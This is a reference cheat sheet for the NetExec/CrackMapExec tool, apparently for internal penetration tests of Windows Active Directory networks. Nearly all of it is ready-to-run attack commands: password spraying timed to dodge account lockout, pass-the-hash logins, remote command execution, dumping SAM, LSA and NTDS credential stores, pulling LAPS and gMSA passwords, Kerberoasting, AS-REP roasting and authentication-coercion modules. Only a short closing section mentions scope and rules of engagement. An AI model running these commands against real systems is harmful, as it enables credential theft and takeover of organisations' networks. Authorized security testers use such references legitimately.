CrackMapExec / NetExec Reference
CrackMapExec (cme) is now maintained as NetExec (nxc). Commands below work on both; prefer nxc on new installs.
nxc <protocol> <target> [auth] [action] — protocols: smb, ldap, winrm, mssql, ssh, ftp, rdp, vnc, wmi, nfs.
Authentication probing
# Single cred vs target list
nxc smb targets.txt -u alice -p 'Summer2026!'
# NTLM hash
nxc smb targets.txt -u administrator -H :AAD3B435B51404EEAAD3B435B51404EE --local-auth
# Kerberos ticket
export KRB5CCNAME=/tmp/alice.ccache
nxc smb dc.domain.local --use-kcache
# Show where a user is a local admin (key pivot data)
nxc smb targets.txt -u alice -p 'Summer2026!' | grep '(Pwn3d!)'Password spraying (lockout-aware)
# Check policy BEFORE spraying
nxc smb dc.domain.local -u alice -p 'Summer2026!' --pass-pol
# Spray — --continue-on-success scans the full list even after a hit
nxc smb dc.domain.local -u users.txt -p 'Spring2026!' --continue-on-success
# Staggered spray with a delay-per-user (prevent bad-pwd-count stacking)
for u in $(cat users.txt); do
nxc smb dc.domain.local -u "$u" -p 'Spring2026!' --continue-on-success
sleep 30
doneLeave at least one bad-password-count of headroom below the lockout threshold, and never spray the same account twice within the observation window. When the observation window is 30 minutes and the threshold is 5, safe cadence is roughly ≤4 attempts per account per 35 minutes.
SMB enumeration
# Shares + readable/writable flags
nxc smb target -u alice -p 'Summer2026!' --shares
# Spider shares for interesting filenames / content
nxc smb target -u alice -p 'Summer2026!' \
-M spider_plus -o EXCLUDE_DIRS='IPC$,print$' DOWNLOAD_FLAG=True
# Sessions (live logons — useful for pivot planning)
nxc smb targets.txt -u alice -p 'Summer2026!' --sessions --loggedon-users
# Password policy, users, groups, RID bruteforce
nxc smb dc.domain.local -u alice -p 'Summer2026!' --pass-pol
nxc smb dc.domain.local -u alice -p 'Summer2026!' --users
nxc smb dc.domain.local -u alice -p 'Summer2026!' --groups
nxc smb dc.domain.local -u '' -p '' --rid-brute 5000Command execution
# PowerShell via WinRM (cleanest)
nxc winrm target -u admin -p 'pass' -x 'whoami /all'
# SMB exec via psexec/wmiexec/atexec (choose method)
nxc smb target -u admin -p 'pass' -x 'whoami' --exec-method wmiexec
nxc smb target -u admin -H :NTHASH -X '$PSVersionTable' # -X for PowerShell
# Amsi/AppLocker bypass via obfuscation modules
nxc smb target -u admin -p 'pass' -M enum_avCredential access modules
# Dump SAM
nxc smb target -u admin -p 'pass' --sam
# Dump LSA
nxc smb target -u admin -p 'pass' --lsa
# DCSync via NTDS
nxc smb dc.domain.local -u da_user -p 'pass' --ntds
# LAPS password retrieval
nxc ldap dc.domain.local -u alice -p 'pass' --laps
# gMSA password retrieval
nxc ldap dc.domain.local -u alice -p 'pass' --gmsaAD-specific modules
# List common modules
nxc smb -L
nxc ldap -L
# Kerberoast via LDAP
nxc ldap dc.domain.local -u alice -p 'pass' --kerberoasting kerb.out
# AS-REP roast via LDAP
nxc ldap dc.domain.local -u alice -p 'pass' --asreproast asrep.out
# BloodHound collection (triggers sharphound-py internally)
nxc ldap dc.domain.local -u alice -p 'pass' --bloodhound --collection All \
-ns 10.0.0.1 --dns-server 10.0.0.1
# MachineAccountQuota check
nxc ldap dc.domain.local -u alice -p 'pass' -M maq
# Find computers where domain user is local admin
nxc smb 10.0.0.0/24 -u alice -p 'pass' --loggedon-usersRecommended module set for an internal engagement
| Module | Protocol | Purpose |
|---|---|---|
spider_plus |
smb | Recursive share spidering with filters |
lsassy |
smb | Remote LSASS dump + pypykatz parse |
enum_av |
smb | AV / EDR enumeration |
masky |
ldap | ADCS ESC1 cert issuance via impersonation |
adcs |
ldap | Enumerate vulnerable cert templates |
petitpotam |
smb | MS-EFSR coercion |
shadowcoerce |
smb | MS-FSRVP coercion |
laps |
ldap | Pull LAPS-managed passwords |
gmsa |
ldap | Pull gMSA account passwords |
maq |
ldap | MachineAccountQuota value |
dfscoerce |
smb | MS-DFSNM coercion |
Safety
--continue-on-successis necessary for spray completeness but increases noise. Run from an authorized source IP on an allowlist if possible.- Always verify target scope against the ROE before running with
targets.txtthat came from broad discovery. - Dumping NTDS / DCSync should be run once per engagement with justification, and never against read-only DCs without coordination.
Tool versions validated
- NetExec >= 1.3.0 (or CrackMapExec >= 5.4.0 legacy)